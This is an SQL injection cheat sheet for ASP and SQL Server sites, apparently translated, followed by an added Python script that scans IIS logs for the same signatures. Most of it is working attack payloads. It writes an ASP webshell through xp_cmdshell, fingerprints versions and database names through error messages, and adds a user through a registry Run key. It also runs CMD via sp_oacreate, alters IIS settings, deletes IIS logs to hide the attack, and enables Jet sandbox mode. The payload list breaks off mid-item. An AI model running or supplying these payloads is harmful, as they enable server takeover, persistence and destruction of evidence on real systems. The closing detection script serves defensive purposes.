1. Use the ^ escape character to write an ASP one-sentence Trojan (webshell) file:
- http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> > c:\mu.asp';--
- echo ^<%execute^(request^("l"^)^)%^> > c:\mu.asp
2. Display the SQL Server version:
- http://192.168.1.5/display.asp?keyno=188 and 1=(select @@version)
- http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft VBScript compiler error 800a03f6
End missing
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
/display.asp, line 17
3. When checking the Sony China website for vulnerabilities, it was clear that a vulnerability existed, but it did not match any of the three types above. By accident, I thought of the SQL keyword "in", for example "select * from mytable where id in (1)", where the value inside the brackets is the data we submit. The result is exactly the same as for "select * from mytable where id = 1". So when you request the page, append ") and 1=1 and 1 in (1" to the URL; the original SQL statement becomes "select * from mytable where id in (1) and 1=1 and 1 in (1)", and the long-awaited page appears. For now this type of vulnerability is called the "include number type". If you are smart, you must have thought of the "include number type" as well. By the way, it is caused by a query statement similar to "select * from mytable where name in (firstsee.
4. Determine whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
Command for restoring the xp_cmdshell extended stored procedure:
http://www.test.com/news/show1.asp?newsid=125272;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
5. Write a command line or program into the Startup (Run) key:
http://192.168.1.5/display.asp?keyno=188;exec master.dbo.xp_regwrite 'hkey_local_machine','software\microsoft\windows\currentversion\run','help1','reg_sz','cmd.exe /c net user test ptlove /add'
6. View the current database name:
- http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n)   (change n to 0, 1, 2, 3 ... to walk across databases)
- http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript compiler error 800a03f6
End missing
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp, line 17
7. List all database names:
select * from master.dbo.sysdatabases     -- lists every column of every database record
select name from master.dbo.sysdatabases  -- lists only the name column
8. xp_cmdshell is not required: CMD commands can be run on an injectable SQL Server through the OLE Automation procedures (sp_oacreate / sp_oamethod):
create table mytmp (info varchar(400), id int identity(1,1) not null)
declare @shell int
declare @fso int
declare @file int
declare @isEnd bit
declare @out varchar(400)
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c dir c:\ > c:\temp.txt', 0, true
-- Note: the last run parameter (true) means "wait for the program to finish". It is required for long-running commands such as ping.
exec sp_oacreate 'scripting.filesystemobject', @fso output
exec sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt'
-- opentextfile returns a TextStream object, so @file holds an object token.
while @shell > 0
begin
    exec sp_oamethod @file, 'readline', @out out
    insert into mytmp (info) values (@out)
    exec sp_oagetproperty @file, 'atendofstream', @isEnd out
    if @isEnd = 1 break
    else continue
end
-- the command output is now in mytmp; read it, then clean up:
drop table mytmp
----------
declare @shell int
declare @fso int
declare @file int
declare @isEnd bit
declare @out varchar(400)
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" > c:\temp.txt', 0, true
exec sp_oacreate 'scripting.filesystemobject', @fso output
exec sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt'
while @shell > 0
begin
    exec sp_oamethod @file, 'readline', @out out
    insert into mytmp (info) values (@out)
    exec sp_oagetproperty @file, 'atendofstream', @isEnd out
    if @isEnd = 1 break
    else continue
end
Add the web user to the Administrators group, in one line:
declare @shell int declare @fso int declare @file int declare @isEnd bit declare @out varchar(400) exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" > c:\temp.txt', 0, true exec sp_oacreate 'scripting.filesystemobject', @fso output exec sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt' while @shell > 0 begin exec sp_oamethod @file, 'readline', @out out insert into mytmp (info) values (@out) exec sp_oagetproperty @file, 'atendofstream', @isEnd out if @isEnd = 1 break else continue end
Execute an EXE program, in one line:
declare @shell int declare @fso int declare @file int declare @isEnd bit declare @out varchar(400) exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'cmd.exe /c cscript.exe E:\jeea.net.cn\score\ftsimages\iis.vbs lh1 c:\ > c:\temp.txt', 0, true exec sp_oacreate 'scripting.filesystemobject', @fso output exec sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt' while @shell > 0 begin exec sp_oamethod @file, 'readline', @out out insert into mytmp (info) values (@out) exec sp_oagetproperty @file, 'atendofstream', @isEnd out if @isEnd = 1 break else continue end
Three methods for executing CMD commands from SQL:
First delete the IIS log for July 18 (ex050718.log):
(1) exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt'
(2) declare @shell int declare @fso int declare @file int declare @isEnd bit declare @out varchar(400) exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt', 0, true exec sp_oacreate 'scripting.filesystemobject', @fso output exec sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt' while @shell > 0 begin exec sp_oamethod @file, 'readline', @out out insert into mytmp (info) values (@out) exec sp_oagetproperty @file, 'atendofstream', @isEnd out if @isEnd = 1 break else continue end
(3) First enable the Jet sandbox mode. The registry can be modified through the extended stored procedure xp_regwrite, and the administrator cannot prevent that. For security reasons sandbox mode is disabled by default, which is why xp_regwrite is needed. xp_regwrite requires at least the db_owner permission; for convenience, we recommend testing with sysadmin:
- exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Note: SandBoxMode values:
0 = disabled for everything (default)
1 = enabled for ACCESS, disabled for everything else
2 = disabled for ACCESS, enabled for everything else
3 = enabled for everything
- Here, only the commands that work with the sysadmin permission are given:
Select
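Turning the probes above into detection: the following Python script is an added example, not part of the original cheat sheet, that scans IIS W3C log lines (the same ex*.log files that step (1) of "Three methods" deletes) for the query-string signatures used in items 1 to 8: @@version/db_name() conversion errors, stacked calls to xp_cmdshell, xp_regwrite, sp_addextendedproc and sp_oacreate. The log excerpt is constructed; the rule names are my own labels.

```python
import re
from urllib.parse import unquote_plus
# Constructed IIS W3C log excerpt (not from the page); the query strings mimic the
# page's probes, one of them partly %-encoded. Fields come from the #Fields header.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-18 10:01:02 10.0.0.9 GET /display.asp keyno=188 200
2005-07-18 10:01:09 10.0.0.9 GET /display.asp keyno=188+and+1=convert(int,@@version)-- 500
2005-07-18 10:01:15 10.0.0.9 GET /display.asp keyno=188;exec+master.dbo.xp_cmdshell+'dir' 500
2005-07-18 10:01:22 10.0.0.9 GET /display.asp keyno=188;EXEC+master.dbo.xp_regwrite+hkey_local_machine 500
2005-07-18 10:01:30 10.0.0.9 GET /news/show1.asp newsid=125272;exec+master.dbo.sp_addextendedproc+%78p_cmdshell 500
2005-07-18 10:02:01 10.0.0.9 GET /display.asp keyno=188;declare+@shell+int+exec+sp_oacreate+'wscript.shell',@shell+output 200
2005-07-18 10:02:10 10.0.0.9 GET /FullStory.asp id=1+and+1=convert(int,db_name()) 500
2005-07-18 10:03:00 10.0.0.12 GET /display.asp keyno=190 200
"""

# One rule per technique on the page, matched against the decoded, lower-cased,
# whitespace-collapsed query so that + or %xx encoding cannot hide the keyword.
RULES = [
    ("xp_cmdshell",       re.compile(r"xp_cmdshell")),
    ("ole_automation",    re.compile(r"sp_oa(create|method|getproperty)")),
    ("registry_write",    re.compile(r"xp_regwrite")),
    ("add_extended_proc", re.compile(r"sp_addextendedproc")),
    ("error_fingerprint", re.compile(r"convert\s*\(\s*int\s*,\s*(@@version|db_name\s*\()")),
    ("stacked_query",     re.compile(r";\s*(exec|declare|select|insert|create)\b")),
]

def normalize_query(query):
    """Decode +/%xx escapes, lower-case, and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()

def classify(query):
    """Names of every rule the query string trips, in RULES order."""
    q = normalize_query(query)
    return [name for name, rx in RULES if rx.search(q)]

def parse_w3c(text):
    """Yield one dict per record, taking column names from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and len(line.split()) == len(fields):
            yield dict(zip(fields, line.split()))

def scan_log(text):
    """(time, client ip, uri stem, rules) for every record whose query trips a rule."""
    return [(r["time"], r["c-ip"], r["cs-uri-stem"], rules)
            for r in parse_w3c(text) if (rules := classify(r["cs-uri-query"]))]
```

Since the page's own procedure deletes the log on the host, run this against copies of the logs shipped off the web server rather than the files in logfiles\W3SVCn.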